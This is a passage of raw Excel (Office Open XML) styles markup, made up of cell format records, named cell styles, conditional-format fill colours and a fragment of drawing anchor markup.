    <xf numFmtId="166" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="164" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="11" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="164" fontId="11" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="6" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="168" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="168" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="168" fontId="10" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="164" fontId="10" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="167" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="167" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="49" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="166" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="167" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="164" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="49" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="49" fontId="10" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="10" fillId="5" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="10" fillId="3" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="6" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="6" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignmen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7" fillId="5" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="164" fontId="7" fillId="5" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="2" xfId="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="169" fontId="6" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="169" fontId="6" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="169" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="169" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="7" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="7" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="8" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="7" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="8" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="169" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="169" fontId="0" fillId="0" borderId="9" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="9" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="10" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="164" fontId="6" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="10" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19"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2" xfId="0" quotePrefix="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="169" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="169" fontId="6" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="1"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="2"/>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="9" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="11" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="11" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="166" fontId="10" fillId="11" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="11" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="169" fontId="6" fillId="7" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="10" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="2" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="7" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="164" fontId="6" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="12" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="7" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="7" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="166" fontId="19" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="7" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="7" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="169" fontId="19" fillId="7" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="169" fontId="6" fillId="7" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="169" fontId="2" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="47" fontId="2" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="22" fontId="2" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="169" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="6" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="14" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="7" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="13" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="169" fontId="19" fillId="7" borderId="9" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="169" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="7" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="6" fillId="7" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="164" fontId="6" fillId="7" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="7" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="7" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="8" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="164" fontId="6" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="7" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="7" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="7" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="169" fontId="6" fillId="0" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="169" fontId="6" fillId="0" borderId="9" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="14" fillId="10" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="6" fillId="0" borderId="9" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="2" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="19" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="6" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="6" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="6" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="7" borderId="13" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="12" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="7" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="7" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="7" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="6" fillId="7" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="20" fillId="7" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="9" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="10" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="5" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="1" applyFont="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1"/>
  </cellXfs>
  <cellStyles count="3">
    <cellStyle name="Hyperlink" xfId="1" builtinId="8"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
    <cellStyle name="Normal 2" xfId="2" xr:uid="{F0E33444-B89A-440F-8EC8-0D27B9A813A5}"/>
  </cellStyles>
  <dxfs count="27">
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFCE8B2"/>
          <bgColor rgb="FFFCE8B2"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFD9D9D9"/>
          <bgColor rgb="FFD9D9D9"/>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ill>
        <patternFill patternType="solid">
          <fgColor rgb="FFB7E1CD"/>
          <bgColor rgb="FFB7E1CD"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFF4C7C3"/>
          <bgColor rgb="FFF4C7C3"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFD9D9D9"/>
          <bgColor rgb="FFD9D9D9"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFEA9999"/>
          <bgColor rgb="FFEA9999"/>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CFE2F3"/>
          <bgColor rgb="FFCFE2F3"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFCCCCCC"/>
          <bgColor rgb="FFCCCCCC"/>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F4C7C3"/>
          <bgColor rgb="FFF4C7C3"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FF3C78D8"/>
          <bgColor rgb="FF3C78D8"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <border outline="0">
        <top style="thin">
          <color indexed="64"/>
        </top>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5</xdr:col>
      <xdr:colOff>38100</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>47625</xdr:rowOff>
    </xdr:from>
